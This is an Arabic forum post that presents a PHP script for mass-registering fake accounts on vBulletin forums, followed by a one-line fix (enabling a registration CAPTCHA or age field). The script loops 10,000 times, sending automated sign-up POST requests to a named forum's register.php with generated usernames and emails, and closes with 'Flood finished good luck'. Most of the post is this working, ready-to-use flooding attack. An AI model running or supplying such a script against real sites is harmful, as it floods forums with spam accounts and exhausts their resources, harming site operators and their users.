السلام عليكم ورحمة الله
الثغره في تقريبا جميع اصدارات vBulletin
طبعا هذا سكربت يقوم بتسجل عضويات في المنتدى بشكل كبير
الاستثمار
كود PHP:
<?
set_time_limit(60);
//You can change 10 to other numbers
for($i = 1 ; $i <= 10000 ; $i++)
{
//to put curl to send POST request
$ch = curl_init();
//change http://www.alm3refh.com/vb/ to the url of the script
curl_setopt($ch , CURLOPT_URL , 'http://www.alm3refh.com/vb/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=loo0ool'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=loo0ool'.$i.'@gmail.com&emailconfirm=loo0ool'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished good luck
?>
الترقيع
حل هذي الثغره تفعيل الصوره العشوائيه اثناء التسجيل او تفعيل العمر بكذا تمنع التسجيل بهذ السكربت